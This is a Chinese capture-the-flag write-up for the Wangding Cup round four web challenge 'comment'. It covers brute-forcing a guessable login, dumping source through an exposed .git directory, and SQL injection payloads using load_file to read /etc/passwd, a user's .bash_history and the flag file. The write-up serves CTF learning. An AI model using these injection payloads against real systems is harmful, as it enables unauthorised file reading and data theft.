网鼎杯第四场web部分解题过程——comment

0x01 comment

1. 爆破账号

网鼎杯第四场web部分解题过程——comment_第1张图片

网鼎杯第四场web部分解题过程——comment_第2张图片
根据提示去猜解爆破即可
user:zhangwei pass:zhangwei666

0x02 .git泄露

1.GitHack

这里写图片描述

网鼎杯第四场web部分解题过程——comment_第3张图片

0x03 注入查询

1. 查询当前user

 ', content=(select user()),/*+*/

+*/#注释触发

网鼎杯第四场web部分解题过程——comment_第4张图片
网鼎杯第四场web部分解题过程——comment_第5张图片

2.查询pass

    ',content=(select load_file('//etc/passwd')),/*

+/#触发

网鼎杯第四场web部分解题过程——comment_第6张图片

3.读取www用户的/bin/bash_history

',content=(select load_file('//home/www/.bash_history')),/*

网鼎杯第四场web部分解题过程——comment_第7张图片

网鼎杯第四场web部分解题过程——comment_第8张图片

cd /tmp/ unzip html.zip rm -f html.zip cp -r html /var/www/ cd /var/www/html/ rm -f .DS_Store service apache2 start

4.查询.DS_Store文件

',content=(select hex(load_file('//tmp/html/.DS_Store'))),/*

网鼎杯第四场web部分解题过程——comment_第9张图片

5.十六进制文件读取

网鼎杯第四场web部分解题过程——comment_第10张图片

flag_8946e1ff1ee3e40f.php

6.读取flag文件

路径:/var/www/html/flag_8946elfflee3e40f.php
',content=(select hex(load_file('//var/www/html/flag_8946e1ff1ee3e40f.php'))),/*

网鼎杯第四场web部分解题过程——comment_第11张图片


$flag = 'flag{8ad507fc-c986-4099-ab71-08335764c34a}';
?>

你可能感兴趣的:(ctf)